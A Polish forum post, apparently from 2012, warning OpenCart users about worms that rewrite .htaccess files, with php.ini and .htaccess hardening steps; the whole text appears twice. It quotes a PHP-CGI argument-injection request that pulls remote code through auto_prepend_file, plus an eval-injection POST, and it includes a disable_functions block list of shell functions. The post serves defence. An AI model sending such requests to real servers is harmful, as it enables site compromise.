Uwaga na zagrozenie atakami robali na OC
Posted: Sat May 19, 2012 1:30 am
Witam
Właśnie dołączyłem do grona użytkowników zbanowanych i usuniętych z forum.opencart.com za ujawnienie podatności OC na atak i podanie zmian koniecznych do lepszego zabezpieczenia OC.
Rady zostały usunięte z głównego forum i nie poprawiono dokumentacji. Może poniższe uwagi wam się pomogą.
Ostatnie ataki objawiają się zmodyfikowanymi przez robala plikami htaccess które cały ruch robotów wyszukiwarek przekierowują na strony bandytów.
Poniżej zabezpieczenia przed atakami typu
# wstrzyknięcie exploita przez dauto_prepend_file
GET /index.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://wsdsf..fffm/a.txt'
# wstrzyknięcie exploita przez eval
POST /config.php?w1566t=1
Niezbędne korekty
dodatki do php.ini
allow_url_fopen = Off;
allow_url_include = Off;
#disable injection
auto_prepend_file =none;
expose_php = Off;
display_errors = Off;
display_startup_errors = Off ;
register_globals = Off;
#add eval to list
disable_functions = exec,shell_exec,passthru,system,eval,show_source,proc_open,popen,parse_ini_file,dl;
dodatki do .htaccess
#Block access to configuration files like config.php, set chmod 444 too.
<FilesMatch "config.php">
Order deny,allow
Deny from all
</FilesMatch>
# Use this rule if you can't configure apache or php.ini
RewriteCond %{QUERY_STRING} auto_prepend_file
RewriteRule ^(.*)$ - [F,L]
Oczywiście najleszym sposobem jest odfiltrowanie calego ruchu z 'dauto_prepend_file' w nagłówkach i załatanie php.
Właśnie dołączyłem do grona użytkowników zbanowanych i usuniętych z forum.opencart.com za ujawnienie podatności OC na atak i podanie zmian koniecznych do lepszego zabezpieczenia OC.
Rady zostały usunięte z głównego forum i nie poprawiono dokumentacji. Może poniższe uwagi wam się pomogą.
Ostatnie ataki objawiają się zmodyfikowanymi przez robala plikami htaccess które cały ruch robotów wyszukiwarek przekierowują na strony bandytów.
Poniżej zabezpieczenia przed atakami typu
# wstrzyknięcie exploita przez dauto_prepend_file
GET /index.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://wsdsf..fffm/a.txt'
# wstrzyknięcie exploita przez eval
POST /config.php?w1566t=1
Niezbędne korekty
dodatki do php.ini
allow_url_fopen = Off;
allow_url_include = Off;
#disable injection
auto_prepend_file =none;
expose_php = Off;
display_errors = Off;
display_startup_errors = Off ;
register_globals = Off;
#add eval to list
disable_functions = exec,shell_exec,passthru,system,eval,show_source,proc_open,popen,parse_ini_file,dl;
dodatki do .htaccess
#Block access to configuration files like config.php, set chmod 444 too.
<FilesMatch "config.php">
Order deny,allow
Deny from all
</FilesMatch>
# Use this rule if you can't configure apache or php.ini
RewriteCond %{QUERY_STRING} auto_prepend_file
RewriteRule ^(.*)$ - [F,L]
Oczywiście najleszym sposobem jest odfiltrowanie calego ruchu z 'dauto_prepend_file' w nagłówkach i załatanie php.